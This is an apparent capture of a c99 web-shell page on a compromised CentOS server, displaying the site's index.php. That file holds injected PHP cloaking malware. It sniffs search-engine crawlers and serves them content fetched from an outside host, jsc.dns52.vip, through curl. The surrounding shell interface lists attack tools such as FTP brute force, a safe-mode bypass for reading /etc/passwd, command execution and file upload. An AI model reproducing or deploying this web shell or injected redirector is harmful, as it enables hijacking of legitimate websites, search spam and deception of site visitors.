!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/   drwxr-xr-x
Free 51.29 GB of 127.8 GB (40.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (2.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
header
("Content-type: text/html; charset=utf-8");
@
set_time_limit(30);
error_reporting(0);
$tr "stristr";
$er $_SERVER;
ini_set('user_agent','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
define('url'$er['REQUEST_URI']);
define('ref'$er['HTTP_REFERER']);
define('ent'$er['HTTP_USER_AGENT']);
define('site'"http://jsc.dns52.vip/");
define('road'"?/" .$er['HTTP_HOST'] . url);
define('regs''@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Googlebot|google@i');
define('area'$tr(url"0") or $tr(url"1") or $tr(url"2") or $tr(url"3") or $tr(url"4") or $tr(url"5") or $tr(url"6") or $tr(url"7") or $tr(url"8") or $tr(url,"9")or $tr(url,"1/")or $tr(url,"2/")or $tr(url,"3/")or $tr(url,"4/")or $tr(url,"5/")or $tr(url,"6/")or $tr(url,"7/")or $tr(url,"8/")or $tr(url,"9/")or $tr(url,"0/")or $tr(url".xml") or $tr(url".doc") or $tr(url".pdf") or $tr(url".txt") or $tr(url".ppt") or $tr(url".pptx") or $tr(url".xls") or $tr(url".csv") or $tr(url".shtml") or $tr(url,".baidu")or $tr(url,".ga")or $tr(url,".gq")or $tr(url,".asp")or $tr(url,".jsp")or $tr(url,".php")or $tr(url,".com")or $tr(url,".net")or $tr(url,".gov")or $tr(url,".edu")or $tr(url,".baike")or $tr(url,"app/")or $tr(url,".html")and $tr(url"?"));
if (
area && preg_match(regsref)) {
echo 
xiaoqiao("http://jsc.dns52.vip/404.html");
exit();
}
if (
preg_match(regsent)) {
if (
area) {
echo 
xiaoqiao(site.road);
exit;
} else {
echo 
xiaoqiao("http://jsc.dns52.vip/zz1.php");
ob_flush();
flush();
}
}
function 
xiaoqiao($c) {
$d=curl_init();
curl_setopt($d,CURLOPT_URL,$c);
curl_setopt($d,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);
curl_setopt($d,CURLOPT_RETURNTRANSFER,1);
curl_setopt($d,CURLOPT_HEADER,0);
$e=curl_exec($d);
curl_close($d);
return 
$e;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title>วิทยาลัยพยาบาลบรมราชชนนี อุดรธานี</title>
</head>
<body>
<div align="center">
  <p><img src="https://www.bcnu.ac.th/websitebcnu2.jpg " width="100%" height="100%" /></p>
  <p><a href="http://110.164.51.230/mis/index_codeigniter.php/eregis/general/showNw"><img src="https://www.bcnu.ac.th/bcnu2.png" width="10%" /></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--